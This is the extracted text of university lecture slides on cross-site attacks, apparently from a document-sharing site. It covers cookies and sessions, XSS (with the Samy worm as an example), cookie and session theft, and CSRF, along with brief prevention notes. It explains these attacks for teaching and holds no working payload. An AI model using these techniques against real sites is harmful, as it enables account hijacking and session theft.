Professional Documents
Culture Documents
S23U14438 - Lecture 14 - XSS
S23U14438 - Lecture 14 - XSS
Outline
Cookies and Sessions – Refresher
Cross-Site Attacks
Cross-Site Scripting (XSS)
Cross-Site Request Forgery (CSRF)
COOKIES AND SESSIONS
How things work before we start messing with them….
Web browsing is stateless
Browser does not maintain a connection to the server while
you look at a page
You may: never return/be a long time on a page/be on for one
second
Server needs to distinguish you from other clients (browsers)
Browser state is stored in “Cookies”
Server state is stored in “Sessions”
Have you noticed how….
Number is used to pick from the many sessions that the server has active at any one
time
Server software stores data in the session that it wants to have from one request to
another from the same browser.
Shopping cart
Login information
Cookies and Session IDs
Source: https://cscie12.dce.harvard.edu/lecture_notes/2006-07/20070410/slide46.html
Stateless vs Stateful apps
Sticky sessions
Sticky sessions:
Samy Kamkar
https://www.youtube.com/watch?v=DtnuaHl378M (5 mins)
Two Types of Attack
Web
server
Legitimate FB Request
Trusted
JS
JS JS Un-Trusted
JS
JavaScript:
- Sends requests
- Uses session cookie
ENTER XSS ATTACKS
Channeling Sam’s code to Alice’s browser
Basic trick to XSS Attack
In Samy’s
browser
Hidden CODE
In Alice’s
browser
Hidden CODE
Stealing the cookie to run attack
outside Alice’s account
More practical: Perform request on
Alice’s own browser
How to prevent it?
Filter input on arrival
Knowing source of request: Referrer field: Good idea but often stripped out for privacy
Legitimate Cross-Site Request
Session ID 3
Sam
Stealing Alice’s Session ID
Session ID 3
Sam
Method 2 Running code in Alice’s Browser
CODE Session ID 1
If Sam can get Alice to run
his code on her browser…
Session ID 1
Alice Sam’s request will use
Alice’s Session ID...
Session ID 2 Web
Sam does not need to
Site know Alice’s Session ID
Bob
csrf=WfF1szMUHhiokx9AHFply5L2xAOfjRkE&email=wiener@normal-user.com
How to prevent it?
Checking the referer header (commonly used on embedded network devices)
Outline
Cookies and Sessions – Refresher
Cross-Site Attacks
Cross-Site Scripting (XSS)
Cross-Site Request Forgery (CSRF)